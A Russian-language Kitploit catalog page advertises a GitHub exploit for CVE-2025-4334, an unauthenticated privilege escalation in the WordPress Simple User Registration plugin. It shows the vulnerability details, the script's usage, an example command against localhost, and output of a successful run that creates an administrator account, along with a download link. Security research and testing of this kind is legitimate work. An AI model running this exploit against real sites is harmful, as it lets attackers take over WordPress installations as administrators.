Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-4334 — Simple User Registration <= 6.3 - Неаутентифицированное повышение привилегий | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-4334
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-4334

CVE-2025-4334

Simple User Registration <= 6.3 - Неаутентифицированное повышение привилегий

Репозиторий
7331 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔓 Simple User Registration <= 6.3 - Повышение привилегий без аутентификации

📄 Описание

Плагин Simple User Registration для WordPress уязвим к повышению привилегий во всех версиях до 6.3 включительно.
Это связано с недостаточными ограничениями на значения мета-данных пользователя, которые могут быть указаны при регистрации.
Это позволяет неавторизованным злоумышленникам регистрироваться в качестве администратора.


🛡️ Детали уязвимости

  • Тип: Неправильное управление привилегиями
  • CVE: CVE-2025-4334
  • Оценка CVSS: 9.8 (Критическая)
  • Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Опубликовано публично: 25 июня 2025 года
  • Последнее обновление: 26 июня 2025 года

🛠️ Скрипт эксплойта

Эксплойт автоматизирует повышение привилегий через отправку формы с использованием извлеченного nonce, ID формы и referer.

⚙️ Использование

root@kitploit:~
python CVE-2025-4334.py -h
root@kitploit:~
usage: CVE-2025-4334.py [-h] -u URL --form FORM

Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Base WordPress URL (e.g. http://localhost/wordpress/)
  --form FORM    Full URL of the page that contains the registration form

🌐 Пояснение по URL

  • -u → Базовая установка WordPress (например, http://localhost/wordpress/)
  • --form → Полный URL страницы с уязвимой формой регистрации (например, http://localhost/wpr/default-registration/)

🧪 Пример

root@kitploit:~
python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/

✅ Результат

root@kitploit:~
[i] Extracted Nonce   : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path      : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response    : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}

[+] Exploitation Successful
[+] Username   : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name  : Nxploitedadmin
[+] Email      : [email protected]
[+] Password   : nxp1234
[+] Role       : administrator

Exploit By : Khaled_alenazi (Nxploited)

⚠️ Отказ от ответственности

Этот скрипт предоставляется только для образовательных и исследовательских целей.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.


Автор: Khaled_alenazi (Nxploited)

Скачать инструмент